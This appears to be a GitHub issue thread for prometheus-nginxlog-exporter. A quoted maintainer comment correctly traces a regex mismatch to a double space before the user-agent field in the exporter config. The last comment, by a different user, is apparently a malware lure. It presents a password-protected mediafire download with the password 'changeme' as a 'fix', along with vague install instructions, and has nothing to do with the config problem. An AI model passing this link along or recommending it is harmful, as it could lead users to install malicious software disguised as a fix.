### ISSUE TITLE
At a quick glance: In your exporter config there are two spaces before `\"$http_user_agent\"`, instead of one (like in the NGINX config); this will most likely cause the generated regex to not match any of the log lines, because the exporter will then also expect double spaces in your log lines.

### ISSUE THREAD

**Issue by palansher** [martin-helmich/prometheus-nginxlog-exporter#393]
At a quick glance: In your exporter config there are two spaces before `\"$http_user_agent\"`, instead of one (like in the NGINX config); this will most likely cause the generated regex to not match any of the log lines, because the exporter will then also expect double spaces in your log lines.

Hope that helps.

_Originally posted by @martin-helmich in https://github.com/martin-helmich/prometheus-nginxlog-exporter/issues/309#issuecomment-1383654782_

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
